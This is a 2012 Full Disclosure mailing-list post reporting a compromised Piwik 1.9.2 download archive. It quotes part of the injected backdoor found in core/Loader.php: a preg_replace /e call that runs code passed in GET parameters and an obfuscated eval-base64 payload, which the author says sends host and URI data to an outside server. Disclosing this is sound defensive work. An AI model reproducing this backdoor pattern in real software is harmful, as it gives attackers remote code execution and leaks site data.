Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Possible infection of Piwik 1.9.2 download archive
From: Maximilian Grobecker <max () grobecker-wtal de>
Date: Mon, 26 Nov 2012 21:17:57 +0100

Hi,

this evening I downloaded a fresh archive of Piwik 1.9.2 and found this
code at the bottom of the /piwik/core/Loader.php file:

(Just a short snippet)
-----------snip-------------
<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
     preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
   }
   if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s
[.......]

-----------/snip-------------

I decoded some parts of this code and found what it does:
It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and
the request URI via POST to http://prostoivse.com/x.php and creates a
file named "lic.log" in the same directory.
As long as this file exists it seems that no further POST requests are made.

At the moment I'm trying to figure out the further sense of this code,
but it seems that there might also be some kind of backdoor (because of
the use of $_GET).

The file in the downloadable archive is dated at
Nov 26, 2012 / 18:42 UTC.

 From forums I know that some people downloaded the archive earlier this
day and don't have this code inside their files.

At the moment (at 8:08 PM UTC) the archive is downloadable at the
original Piwik web site with this obfuscated code.

I contacted the developers and managers of Piwik a few minutes ago about
this.

--
Greetings from Wuppertal, Germany

Max Grobecker